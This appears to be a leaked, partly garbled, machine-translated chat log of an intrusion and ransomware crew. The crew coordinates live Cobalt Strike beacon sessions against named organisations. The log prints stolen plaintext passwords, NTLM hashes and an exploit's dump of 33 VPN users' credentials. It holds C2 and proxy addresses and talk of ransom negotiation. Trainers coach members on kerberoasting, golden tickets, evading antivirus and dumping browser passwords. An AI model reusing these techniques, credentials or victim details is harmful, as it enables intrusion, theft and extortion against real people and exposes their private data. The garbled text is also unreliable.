How do I know that @user3 is working with tpsh>I refer you to @user3 he works with tpsh>and you are in one place in this forum already met the information about this I do not know that someone else in tpsh could give me the load?[ ](https://mediaeveryone.com/channel/general?msg=hPxT9hsQA8o3dFvqP) i already answered in #general all sit there 2 people besides me had access therewas 5 people in one place[ ](https://mediaeveryone.com/channel/general?msg=5mapbAMAwqNMc4RMF) m? and got nothing i posted about it yesterday and i see that you chose to wait 4 hours ask your colleagues coba pulled or la/da got? i had a choice? 4 hours of what? just sat for 4 hours? i waited for it yesterday @user8 what have you been doing for the last 4 hours? waiting for the load? we could not press 2 buttons and give the load to a colleague? me and @user8 ?how many people in the team? what more accurate? > i need a team to spawn in tcph.stg-healthcare.com[ ](https://mediaeveryone.com/channel/general?msg=aeofhWmcgAmQw4Ah2) that is the team in tpsh can?[ ](https://mediaeveryone.com/channel/general?msg=pGT2JSTaectAeK8Mm) more accurate? i had the same as i wrote in the chat roth trying to make portfwd does not want to workNormalized build alreadya command to tpsh can? how are you doing?:v:no thanksZe8ZW53FztpsVFTuser3a password can not rememberwhat - what? his, he rearranged the system what login?@tl1 stalin in the rocket can not authorize, throw the password will be todaybuild? and the rocket was lying and could not go in any way rdp, because access in the rocket is lying for tpslichno i command wait for what? wait for what? i need a command to spawn in tpsh for the net `tcph.stg-healthcare.com` what are you doing now? hello, we too hello, i was the only one lying roquet? hello? it seems pinged first from dc, then from the car admins, everywhere 100% loss another network segment is visible? ok, then skip it, see what the other addresses are yes it was cut off? 
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 02:36:56> shell ping 192.168.100.247 -n 1 [*] Tasked beacon to run: ping 192.168.100.247 -n 1 [+] host called home, sent: 68 bytes [+] received output: Pinging 192.168.100.247 with 32 bytes of data: Request timed out. Ping statistics for 192.168.100.247: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), ``` understandable (doesn't even let you log in ``` The connection has timed out The server at 192.168.100.247 is taking too long to respond. The site could be temporarily unavailable or too busy. Try again in a few moments. If you are unable to load any pages, check your computer's network connection. If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web. ``172.93.105.2:18541 give soxy from dk under tokeno and from owner's car Disks are seen from outside? and sox from owner's car? the same crap now i will try from other proxy other place threw? other links then opens so proxy fell off not?i have tried other links but the proxy is down then why not just hit the console and then the white screen?and it takes a long time to load just press enter and it knocks out[ ](https://mediaeveryone.com/group/waterway-com?msg=wqSewELvNyiwWnvd2) no what's inside? something interesting so`http://192.168.100.247/AXIS_ACCC8ECFBF99,http://192.168.100.247/,11/22/2019 1:44:27 PM,13218925467505127,root,Waterway99!``@tl1 @tl2 ``WATERWAY\mharper LoveUnit14`` isn't done yet, let's double-check everything from the browsers and move on``MACMINI-EDC269`what hostname? not taimmachine by any chance[ ](https://mediaeveryone.com/group/waterway-com?msg=7TsNZAcfpHzmPd98t) haven't you finished opening port? 
``192.168.6.160\posserver01\PPXMLData L00k4MyD@ta`Carbonite BackupMac ``` 192.168.0.233:5900 192.168.0.233:3283 192.168.0.233:88 192.168.0.233:22 (SSH-2.0-OpenSSH_8.1) 192.168.0.233:445 ````\\WWSQL\S$\SQLBackup`\\\W2K1\F$\Data\AKPRO_Data\BACKUPS`\\\\W2K1\F$\Backup`\\\W2K1\Data\AKPRO_Data\BACKUPS```` ````\\REPORTING\D$\SQLBackup`mb i just remember that there were two eshi's backed up somewhere in the vg? what's solar? mbr solar? well they restored the network there almost in one click the guys who were doing missed something very important, i myself do not know exactly what it was there was a full restorbla ... LOL@tl1 @tl2 C:\Program Files\N-able Technologies\AVDefender\WscRemediation.exe C:\Program Files\N-able Technologies\AVDefender\EPProtectedService.exe ``They've got bitdefender here,`` C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://designcloud.mockflow.com/,https://designcloud.mockflow.com/,1/19/2017 12:11:15 PM,13129323075436512,gkeller@waterway.com,Waterway99 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.microsoftonline.com/,https://login.microsoftonline.com/common/oauth2/authorize,1/20/2017 8:36:53 AM,13129396613038827,gkeller@waterway.com,W C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://accounts.google.com/,https://accounts.google.com/ServiceLogin,2/16/2017 2:48:17 PM,13131751697642844,waterwaytesting@gmail.com,Waterway99 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.hotschedules.com/,https://www.hotschedules.com/hs/login.jsp,2/28/2017 2:01:56 PM,13132785716990422,2120689,1534603 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://developer.authorize.net/,https://developer.authorize.net/hello_world/sandbox/,2/28/2017 3:31:08 PM,13132791068764829,gkeller727,Waterway99 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User 
no, now we'll get everything ready and we can close
Do you have a lot to do here?
```
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec26 20:50:43> shell net view \\DRB2 /all
[*] Tasked beacon to run: net view \\DRB2 /all
[+] host called home, sent: 51 bytes
[+] received output:
Shared resources at \\DRB2

Share name   Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$       Disk           Remote Admin
Archive      Disk
Backup       Disk
C$           Disk           Default share
E$           Disk           Default share
Install      Disk
IPC$         IPC            Remote IPC
Log          Disk
MailMerge    Disk
Media        Disk
Replication  Disk
SiteWatch    Disk
The command completed successfully.
```
\\DRB2\Archive
\\DRB2\Backup
\\Replication
more backups
```
GKELLER.WATERWAY.COM
MIKEP16.WATERWAY.COM
BLAUERPC.WATERWAY.COM
U06NEWOFFICEPC.WATERWAY.COM
MHARPERNEW.WATERWAY.COM
```
user3@tl1 add @user3 here please
SYSTEM *@192.168.0.222 (WWDC2)
failed?
give me the pass to the session if there is no note there, and check the dca
ok, now you'll get the rest on the rt?
that's it, a tb and a half, you'll score it
4405 File(s) 1,452,604,853,672 bytes
hiter fox
how?
AB - bitdefender
veeam - veeam_admin
with the hypervisor, still figuring it out
found a way to jump over the cars so AB doesn't get fucked up (I don't know if it's too paly or not)
av, veeam, etc. we get it about the backups)
what do we have here?
```
[+] Determining what EDR products are installed on wwdc2...
[+] gzflt.sys Found
[+] 1 EDR Products Found!
======================
| Vendor Information |
----------------------
[+] BitDefender Found!
```
If the admin had hand-wiped, all the sessions would have been dropped from the domain
in the CHSon monitors activity and alertite a means of monitoring the Solarwinds like monitoring
edkveri said tried to jump on the car and the dll av ate it, although when I looked at the tasklist there was nothing like that
hv I found
what is it?
```
Shared resources at \\WWSQL2
My business server

Share name               Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$                   Disk           Remote Admin
barcode                  Disk
C$                       Disk           Default share
CertEnroll               Disk           Active Directory Certificate Services share
Company                  Disk           Company
E$                       Disk           Default share
F$                       Disk           Default share
File History Backups     Disk           File History Backups
Folder Redirection       Disk           Folder Redirection
FTP                      Disk
G$                       Disk           Default share
IPC$                     IPC            Remote IPC
Shared Folders           Disk
TrackIt                  Disk
Users                    Disk           Users
```
Okay, you can give it away to anyone, it's just your personal coba you're responsible for.
hitark.com 192.254.76.130:40500
There's three of us, why can't the others give it to us? :frowning2:
Task SvcRestartTask#31841 2/4/2021 3:40:16 PM Ready
Tried again to drop the fix, check it out.
```
CORP.TELEVISA.COM.MX 10.254.0.116 SYSTEM * CORPKLHLRSD01
```
tuxomibo.com is pinged to level 3
kalarada.com up to 3, not pinged, only 1a, then it makes sense
brute force hash found today, you originally had it? + alive?
there in general mush
Checked the domains, there's only one.
```
* Username : ctxdbadmin
* Domain   : CORP
```
and then brut)
check their accesses first, start with domain and local, and there LA domain users? ))))
the main thing, do not confuse "password incorrect" and "access denied"
in the process, and check on the other servers, but take LA on servers where you can get
a strange, and he went straight to the lock? 1 you 19 times tried?
```
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          120
Minimum password length:                              12
Length of password history maintained:                6
Lockout threshold:                                    20
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        BACKUP
The command completed successfully.
```
Give more net associates with their hash on the servers
take take, not touch it then
ok, I did not try the hash a second time, there is apparently a lockout on it, 1 try, I will lock it again at the same time
Plus check this hash for those who are in the Servicio Basico group and in the Domain Admins group
Responsable: Jose Juan Muniz Mendoza. Responsable 2: Adrián Ruíz Mondragon
i would see who these two are, and if they are important, i would check the hash of them too?
so the session weighs with the old password. take a moment) yes?
new la like dirt
Username : ES050616C * Domain : CORP
After I slipped on dc))))
```
beacon> shell net user ES050616C /dom
[*] Tasked beacon to run: net user ES050616C /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain corp.televisa.com.mx.

User name                    ES050616C
Full Name                    Servicio ES050616C
Comment                      CORP - 4337626 - Alta 13/02/2019 - Responsable: Jose Juan Muniz Mendoza. Responsable 2: Adrián Ruíz Mondragon
User's comment
Country/region code          (null)
Account active               Locked
Account expires              Never

Password last set            2/4/2021 1:06:21 PM
Password expires             6/4/2021 1:06:21 PM
Password changeable          2/5/2021 1:06:21 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/27/2021 10:13:01 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Servicio Basico      *Domain Users
                             *User_PSO             *Domain Admins
The command completed successfully.
```
in 10 min
```
beacon> shell net user ES050616C /dom
[*] Tasked beacon to run: net user ES050616C /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain corp.televisa.com.mx.

User name                    ES050616C
Full Name                    Servicio ES050616C
Comment                      CORP - 4337626 - Alta 13/02/2019 - Responsable: Jose Juan Muniz Mendoza. Responsable 2: Adrián Ruíz Mondragon
User's comment
Country/region code          (null)
Account active               Yes
Account expires              Never

Password last set            2/4/2021 1:23:14 PM
Password expires             6/4/2021 1:23:14 PM
Password changeable          2/5/2021 1:23:14 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/27/2021 10:13:01 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Servicio Basico      *Domain Users
                             *User_PSO             *Domain Admins
The command completed successfully.
```
and net user on itpochit please show what is the login to this YES whose hash was the new local admins? (and now there is no august1vhere is a seasonal passchekniklila no, on cmd5 did not check clear7 have a hash?
in general, there are a couple of cars where went YES, you need to monitor them
got out of the user segment of the servers
Found a server with a YES session, but it's been there since August and the password was changed long ago.
pcsb.org - conf conf conf conf
@user3 vpn in work, can you to it + give a sense of help? to helpport)
this is where?
if today will update configs on vpn, give in work
go to sapuga (went home aunt, apparently ... + disassembled?
update injector, obnobrazovaniye new coba?
I1 person need, do add to the chat
in `CORPSFECRT04` if available
krch, if vpn enabled immediately jump to `CORPKIOVDAPGM01`
putilkinaet silkodelevisa flew
Lunch is long
I went to the drugstore) after delivery so to speak, right behind the activated charcoal
here came to work, had lunch and went home) lunch...
everyone left sharply) yeah fuck)
@user7 go smoke alone here))
then @user7 give the silk code
before the store probably give 1 kobe to replace the long?
he came out
@user9 you only kobe died yesterday?
i already filthy kopech... i think only vuduka
what kobe participated in the lot yesterday?
give silkoda later will be?
so far nothing to give out additional (all past (re-run all past?
do through the old designs
now the whole list will go through and will write back what the hell
+ @user7 also vpn
@user3 will give vpn for work
so, we have 2 people without a job?
i will also put invey, but i have not decided where
i will try to determine who the admin is, so i can determine whether they outsource or not
what is in sccy besides monitoring?
in sccy user4, there is also monitoring
i'm only in sccy
what are the rest of them doing?
@user9 in snu and sssutak about today
a don't remember there at all
whining
I'm gonna check the splotches?
Yeah, I've checked them all. no vulnerabilities ms17, net_api, smbghost, rdp exploits, snu.edu
what's left to check?
I have one session from there, no dk, nothing pinged, there is a vpn
snu.edu sccy of the active
What? I have a vpn written out for you, but I do not see any information about it
It's a couple of questions to you
Day))) as a minimum coffee drink
a current tasks what?
do not understand, you do not work?)
I guess on the way
a where everything?)
```
强制用户在时间到期之后多久必须注销?:    从不
密码最短使用期限(天):                   0
密码最长使用期限(天):                   42
密码长度最小值:                         0
保持的密码历史记录长度:                 None
锁定阈值:                               从不
锁定持续时间(分):                       2
锁定观测窗口(分):                       2
计算机角色:                             WORKSTATION
命令成功完成。
```
DC.
```
Domain Controllers:
Server Name  IP Address
-----------  ----------
HZ-DC03      10.246.3.33
HZ-DC04      10.246.3.34
BJ-DC03      10.238.8.100
BJ-DC04      10.238.0.100
HZ-EQDC08    10.246.101.34
HZ-EQDC07    10.246.101.33
```
`````` Administrator:500:aad3b435b51404eeaad3b435b51404ee:ab374db304924054507dd9a9a5b513fd::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:cab016c9f1758dc8dc18600415e33576::: ``YES. ``` The request will be processed at a domain controller for domain cn.net.ntes. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- B6823 cnadmin H10151 luot ntes.cn sileiy winbjplan winplan The command completed successfully. ``Then I do not understand what the problem is.``Lab/Dedic does not count?``We do not have a windup.``There is a windup and https://github.com/quasar/Quasar so, then take a test Empire)``Toolkit has been tested.`` No.``Nets what was/is? On what @tl1 Hello What are the tasks? ptL1 Hello We are all United ┌─[input0@parrot]─[~] └──╼ $ping helpdocpt.club PING helpdocpt.club (162.0.237.18) 56(84) bytes of data. 64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=1 ttl=52 time=206 ms 64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=2 ttl=52 time=207 ms 64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=3 ttl=52 time=208 ms 64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=4 ttl=52 time=414 ms 64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=5 ttl=52 time=207 ms @user8 it's not working, there's no session line, I don't know where to put it thank you + just tell him or forward the guide + well you said through the console in the browser please share your experience with @user8 + can you? ok, thanks if there is 2FA you need to go through the session VPN to work `` [+] Checking URL https://66.161.144.31 [+] Found latest version (9.x+) of SMA appliance [+] Appliance running version 10.2.0.3-24sv [+] Leaking sessions to dump configuration. 
[+] Found: SessionID: 0hxjuDPHx83Rx4vG8T96wfFnQJGVF4UZhT4JrIxBFCYU= userType: 1 userName: rhaffey Password: Carebear11 Domain: Planes [+] Found: SessionID: 1XVOagEBBe6ptLv3yQbhtq0lFpb10KBXlKkRrxUhoKw= userType: 1 userName: mwest Password: Howklmw4 Domain: Planes [+] Found: SessionID: 1ckROGo1Wh7imySZPl7uMtcThtOiXie239BHZP95Xho= userType: 1 userName: grikmim Password: mrckk-0020 Domain: Planes [+] Found: SessionID: 8hrnUTXzfeMdpqBv0uQ6bZG13AJC8QIEezcikn6rRlU= userType: 1 userName: gexnill Password: Fruitninja22 Domain: Planes [+] Found: SessionID: 9pJuG9Tld0RDo08uJYlOoGD0VrQvFKue6qkPfip2dVI= userType: 1 userName: romber Password: Gberry700! Domain: Planes [+] Found: SessionID: DNmFdoJaPCMVDgQ1Z4FwvwMTE5QBqtFMiwBe9BOMZjQ= userType: 1 userName: mitriks Password: AEVT030121! Domain: Planes [+] Found: SessionID: EWtPIi0Eb05MnQhVXQLSqCTNnEtoz5GqRL0WLvU17sk= userType: 1 userName: redgemmtb Password: Tr! [+] Found: SessionID: NeCBR0enViW4ICjFiFeW1F8D92KfgWrTvWgv6007TKM= userType: 1 userName: jmurchis Password: Sabian44987#@ Domain: Planes [+] Found: SessionID: OSKex2Y0GoB38oixxxdQQYc0MT5nKJxf4oeKdSo8yxI= userType: 1 userName: kinjens Password: Greeleys7145 Domain: Planes [+] Found: SessionID: PFCReDwF0qqxJW36ByuCDpZ5J0Zhdl6AfZr8rwFyNEbo= userType: 1 userName: cenglish Password: Alexa019 Domain: Planes [+] Found: SessionID: S52bhF0epI6AWy2O5NVtpUT5rZR2qlVUIRxpfSUXnoM= userType: 1 userName: tilewa Password: Odin2021 Domain: Planes [+] Found: SessionID: SiHFTV6qqKeYsOaTDH8xA4PkOvUW36syhQlhyZjBE30= userType: 1 userName: lesdorn Password: MountVernon25** Domain: Planes [+] Found: SessionID: W1lJsx3fZ100ndMXQPAceYzqyXC1spoSv0zMq5a5hpg= userType: 1 userName: kyteldra Password: Kcakalpld0517! 
Domain: Planes [+] Found: SessionID: WCrZqMccVULFytN0wPY4rB8K636yaP5cV1W5911pRdg= userType: 1 userName: keynemik Password: LumbarL3 Domain: Planes [+] Found: SessionID: Z9sppmZwgJec3Jk0Kcv05sSmQvFwyoe0UVGkv251SeM= userType: 1 userName: dmontgom Password: January2021 Domain: Planes [+] Found: SessionID: advcBv38ZtYqUBAZCVVJl6QoZahzK0UPV5JGBzpLNgk= userType: 1 userName: valura Password: Lacapi2021 Domain: Planes [+] Found: SessionID: bBNhpCwSpZvM7dA04zlPGZvJoBZdk4Z6HMu9wGm3FVg= userType: 1 userName: jmcgrath Password: 36R-mel*21 Domain: Planes [+] Found: SessionID: djXXAOgtFljaj3O9l7OgG2VC8fyYPyPkjb5j1BF1QCNMI= userType: 1 userName: gkeifer Password: Hrmboys8! Domain: Planes [+] Found: SessionID: fUvKJ6qa7PkHQWQWcOeUBBRJctY4JUqJtUGDLVSzLGgns= userType: 1 userName: gcarney Password: Happy2021 Domain: Planes [+] Found: SessionID: kVgDYoRK1ajqbOijrK1uGLNeXE0T99We5MlZSPkXCg= userType: 1 userName: bbradford Password: H@ndb@ll2021 Domain: Planes [+] Found: SessionID: kv38f02A9WSGjNj0xjVedVFinxYdWiyeNZ4aXnYOtCkE= userType: 1 userName: esolotim Password: Qwerty19 Domain: Planes [+] Found: SessionID: lY1v5WeWLHRc2qZQyyrHLtBc4rdOk9LzTvffD108Tc= userType: 1 userName: fsmith Password: Castle47####### Domain: Planes [+] Found: SessionID: n6R7KD4fgc11jsFwF0KV5iduYKRSPyveO22K7zCO1CE= userName: 1 userName: barnlisa Password: ROSIEb22 Domain: Planes [+] Found: SessionID: nRoJ3ZfgAlELS0rtqpLJtpXwRJ6OcBNVflg9KxlcX1s= userType: 1 userName: croltiny Password: globalWORKplace7! Domain: Planes [+] Found: SessionID: qB1kBsFrKOLYL4w9aOktA6jYoJTMc68KRJJoXo3siXCnE= userType: 1 userName: mwinters Password: Carnage2021 Domain: Planes [+] Found: SessionID: u0Xqpn7w8fS4vZn6SAO1JFUYHUTczh5Y5yeoxebQWWg= userType: 1 userName: sanski Password: Jac2010! 
Domain: Planes [+] Found: SessionID: uxs9u9LxBrtY1Oqrx3WuEJPXOsEvmhgMhvr1JHl3rRw= userType: 1 userName: mshafor Password: February2021 Domain: Planes [+] Found: SessionID: v1buCFcYonMDuhyVfRnHwBh6YgNpqjwhTSe5eSMoYu8= userType: 1 userName: ferncroa Password: Bengals21 Domain: Planes [+] Found: SessionID: v5i1hwKI0xbE01s9nPuO9F531n0MxrNE0YYyyel2za0k= userType: 1 userName: wbowen Password: Dptwmb2028 Domain: Planes [+] Found: SessionID: vu19JgbC8zsPGm0q8phBOqUsKIFtkn9itd00j06MuAI= userType: 1 userName: gflasch Password: Pepper33$ Domain: Planes [+] Found: SessionID: wGwVAfJOrLok0CrbbB7g9dUQAlZP2YsQmw9p1113thE= userType: 1 userName: jamafd Password: Hobart2535y Domain: Planes [+] Found: SessionID: wbL2CzsEWESKJxcQw13TBJ7ebU4i6bl7qnffGC0n8Afw= userType: 1 userName: obrown Password: Planes0121 Domain: Planes [+] Found: SessionID: yNylXi0x041YdNCoxmjaGiwG5Y22WNb4tcqD5Dkid1Y= userType: 1 userName: moordavi Password: Planes1! Domain: Planes [+] Done with https://66.161.144.31, found 33 sessions ``ahahahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaaha apparently the feds won't let them pay jana dare: what in the hell HIDE 49 seconds ago Support: Hello, are you ready to negotiate? HIDE 47 seconds ago jana dare: fuck off HIDE ``judging from the screenshot in the general I don't know)``they were writing to the feds is hels? 04 came to your account your guys? pPUnKg2arjexHCi0b6xUm3djAKFrW38CnwoPCirPeZWxAeMRnUXr4Fa7DUxoxbKRspoke in peace) yeah) and i will pass the container) run the adusers through the script to the archive and let it here let the script copy copy copy i do not understand what is happening i can do the easiest things da and it was not a question * no questions) so, more questions? i can go? it will be within 24 hours, so upload it to a file sharing site fuck it, i'll send a link here with a passport to 100 meters as i know no limit on the size? and here upload the file normally yes? 
when i come i will give it to you off here yyyy me too i've been sitting for 24 hours already i'll upload the archive for you ok? i'm dying now i'll just sit here and do a couple more things with your parser that can be reopened+ the rest? +++Do you all have personal cobs?:thumbsup:you will find YES we will move on there in the next couple of hours+while we work with matches+we will go back and have a good appetite in half an hour we will continue good half an hourokay, how long? an hour? rather yes than no)snack)we were not told about lunch in these two days so you have lunch?you take hash krbtgt and make yourself a ticket for any MA and you're on a roll)H time passed, maybe even the next day, and all MA have changed passwords, dumps hashes from dx are taken from that including from MA2) it allows you to make a token from any user)) 1) if you get hash from krbtgt, I've never seen a case where you have a hash file from krbtgt somewhere on the disk (don't read it).txt` is also a good question if we got the hash of the krbtgt user we can do a golden ticket, what can we do with it? just like with ntlm hashes, you throw in a conf - you get the pass once you get the pass immediately passed to you emeralmatherials.com ``` here's the keb ``` $EPM.LOCAL$MSSQLSvc/SDCEPMVMQAPV02.EPM.LOCAL*$:Fujitsu2012 ``Because too serious pass and brute-force does not take) here are the domains in the archive lie, we took kerberos, but finished without it came out, it's all about non-identity, okay. Situation, there is only kerberos hash, what to do with it? Where do I knock? A better question, a counter question, what is the point of getting kerberos hashes if we have never used them? Do you have no help for modules? 
Yes, knowledge about vectors and what you can and cannot do gives you useful modules; your task is to study them, document, check and use them in practice, you should do this task in another way, I can write everything about each module, but if you do not study the modules they give, what is the point? https://cisoclub.ru/kerberoasting/ maybe you can tell us? more details, what kind of hashes, where from, whose, how they get there, why they are not the same everywhere, etc. gives some output to the console (you can also write "gives some output to the console") collects hashes from memory, as well as everything else, in principle, just for the record, how does invoke-kerberoast work? and another thing, the better you know how the network works together with Active Directory, the better your understanding of what can be done in it; we give you only the basics, to show that you can do this, but it is not always necessary, the better you think in the context of the task in the whole vector, so the more you train to do the UAC bypass, look for your own modules for the tasks on git, read guides, etc. as well as everything else, in fact, this can only be cured by experience) inattention, you sometimes retry 3-6 times in the hope that something will change and you do not read the command output then can we add more tools to our arsenal at lunch time? let's sit and do some research at lunchtime[ ](https://mediaeveryone.com/channel/general?msg=HY3ZumpXaCbLmxJPw) from what I've seen[ ](https://mediaeveryone.com/channel/general?msg=QTfEBz7jkqkEardwe) even to give an example, in some Zelda you can't pass a riddle, you look at the YouTube walkthrough and you're already advanced, just here with the analysis, listen to the reasoning, some tricks from a practised hand, and then we'll take apart the new material after lunch more questions for a couple of hours maybe while you go to lunch didn't you negotiate an hour off for lunch? 
or you go?[ ](https://mediaeveryone.com/channel/general?msg=WKA2Jom9LuADmvBea) the same rebuilding of modules based on the starting environment, it will just be faster because the hand is practised) 2-5) first search for the same command on git as a C# .NET application, then third-party modules that can be imported, and as a last resort - download the module to your own dedicated server, take the source file and move it by hand into the modules folder on the target machine - perform the necessary actions - clean up after yourself it is clear, it's just incredibly interesting to watch the passage of at least one network directly in the field with reasoning, and not like everyone on the Internet in your lab without a hitch 2-3) build your own exe version and run it the same questions? because you didn't go further than PE, but today we will[ ](https://mediaeveryone.com/channel/general?msg=5sWj3jXdCZqfa2LGg) already on the LP there may be differences at the stage of UAC for example, at the stage of domain disconnection in the EA context so no experience at all. By the way, yes, it would indeed be extremely interesting to see how someone more professional than us works. Not identical sessions, identical actions* understandably not identical, but the algorithm in different contexts is approximately the same: low priv - collect what's available; LA/System - mimikatz and other more serious things; DA - we haven't used anything but dcsync Just for the contexts, the actions are essentially identical, maybe we are not working as we should, and maybe it is so it's understandable that situations are different and all We are not just expanding the arsenal, methods, structuring somewhere you drop the AV for 5 minutes of any activity, etc. somewhere none of the modules will work at all, somewhere you can run kerberoast for 10 minutes You understand that sessions are far from identical Yes, from the appearance of the session to the DC by the way where are the 2 users still? the question at the level of "what if Stalin 
was alive now", for example, raising privileges for the average life of one session from 1 minute to 4 hours?well once from the side to see what to do after the first session?) the order of what?) well the order of what actions? will there be a "master class" with a description of actions ?[ ](https://mediaeveryone.com/channel/general?msg=guBDpNRBxZXHDQioL) do not know what to describe here - what is required in the user context or tied to it (browsers, winscp, putty etc.) do from the user context, what requires system rights (hashdump, logonpassword) from the system[ ](https://mediaeveryone.com/channel/general?msg=u8SJcuXGnrkeCtBXb) please answer the question you may have when you have tried everything [ ](https://mediaeveryone.com/channel/general?msg=2JB9BEAgsYLjYY8Ae) I never used it but it should be in your arsenal anyway because it could be the last vulnerability to raise your rights) you have a mindmap and you can go to any point you want [ ](https://mediaeveryone.com/channel/general?msg=XTmBDzwfkSKsKXJHh) it depends on the problem. if your session crashes - you see what AV, if you need to get on the target machine - idletime, the maximum useful information is passwords and hashes, because you will at least have a dictionary for the brute force, at most you will have a dictionary for the brute force attack, and at most you will have a system to try to reach other hashes/passwords. The point is you can't hashdump without a rights system, right?passwords, hashes, that's why I asked the question, what to look for in winpis a lot of information about elevating privileges via dllhijack - how often is this technique used in real life? does it make sense to mess around with it? Target : MicrosoftOffice16_Data:orgid:simon.bolley@gpj.com UserName : Password : Canada!75 CredentialType : Generic PersistenceType : LocalComputer LastWriteTime : 1/21/2020 9:16:27 AM ``Skip open your seatbelt on gpj of course)``I never found passwords in winPEAS and seatbelt. 
These questions are answered by the modules above - the question is where they are and how to get them - the maximum benefit is passwords what did I get out of them in chat, what was useful and what was worth getting out, what was not worth getting out - I mean, besides the list of shares, AV and other things, what would be useful to get out? it's all by category and there's a link to the site with a description ``` https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation `````` https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS ``[ ](https://mediaeveryone.com/channel/general?msg=QgGf843gNp4ZJSSBb) as an option, idletime to check when the last user activity was before you enter by rp 2-1) got an error - google it, in time you will learn the popular errors (cobaltstrike error 5 - If you get an error 5 (access denied) after you try to link to a Beacon) 2-2) on passwords and "interesting" files that may contain passwords. you can also look for internal portals that may be vulnerable (a la SQL injection), which will allow you to open a session already on the server 2-3) don't understand the question. 2-4) let's leave the question for now. 2-5) don't understand the question. 2-6) Cobalt itself adds this information when you scan hosts through portscan and Cobalt sees the OS, it will automatically add it to the Targets, the command adds Hashdump hashes, etc., Type in addition to the default AdFind and other collectors, what can you use in low priv? can you shed light on which tools are best used in what contexts pro 2-2 support, maybe in `group ` instead of `all ` it makes sense to specify something else in some cases? The same about winPEAS, the output is gigantic, but what is the most useful to pull out? 
first questions on the already existing knowledge and experience, then how to understand `disassemble the network`?VladislavHolding said in the video that we were not taught how to parse the network, which tools are better to use and in what cases (at least a couple for a more detailed study of them) about 1, I can assume the way you work, that you do not return the original context after creating tokens. And the modules require requests to the `psinject` - `This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process` 1) This is taken from PowerView via psinject :^), but the point is that it popped up with both Invoke-Kerberoast and SMBAutoBruteThis release integrates Lee's work with Beacon. The `powerpick [cmdlet+args]` command will spawn a process, inject the Unmanaged PowerShell magic into it, and run the requested command. I've also added `psinject [pid] [arch] [command]` to Beacon as well. This command will inject the Unmanaged PowerShell DLL into a specific process and run the command you request. This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process1) what module? 2) All possibilities are on the git info page, where you can find the help) 3) psinject is running psh code in a different process, this prevents you from killing the session if psh code execution is detected in the system 4) don't know, never used this argument) 5) `execute-assembly /SharpChrome.exe logins /showall` 1. This error: ``` ERROR: Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect. ERROR: " ERROR: At line:13117 char:24 ERROR: + else { $Results = $GPOSearcher.FindAll() } ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException ERROR: + FullyQualifiedErrorId : DirectoryServicesCOMException ERROR: ``` What's the problem with this one? How do I get around it? What does it mean? 2. 
"rubeus is a more serious tool ;-)" What other features does it have besides asreproast and kerberoast? 3. What is the main difference between powerpick and psinject, if you say that the latter is better than the former, but the former worked yesterday in powerView, unlike the latter? 4. What is the meaning of ` /privileges:enable` argument at `wmic` if specifying LA/DA credentials? 5. How to work with SharpChrome, not SharpWeb, but Chrome. It does not have the most understandable help, how many attempts have not been - in vain so what? minutes to prepare a list of the first hour we will deal with general questions about the software, vectors, etc.hi:space_invader:Good morningGood morning, we are waiting for now, this week we will get and sessions and a new tool.hhs on sessions ?good afternoon all )maybe on the Spacewalk crescendo find through this program it backups only on the computer, i'm looking for in the browser can check the cloud sync settings please he backups to san1? and look please install date softalol) a little more ``a little bit ``. Teemo[FILES]Administrator */4144|2021Feb02 02:03:39> idle [*] Tasked beacon to run .NET program: IdleTime.exe [+] host called home, sent: 111147 bytes [+] received output: CurrentUser : FILES\Administrator Idletime : 08h:09m:20s:125ms (0 milliseconds) ``` No, not yet)Do you want to go to the rdp and see the goo? It happens, try from another car to throwProsya as not alive some pages for five minutes opensadmin't you found it? 
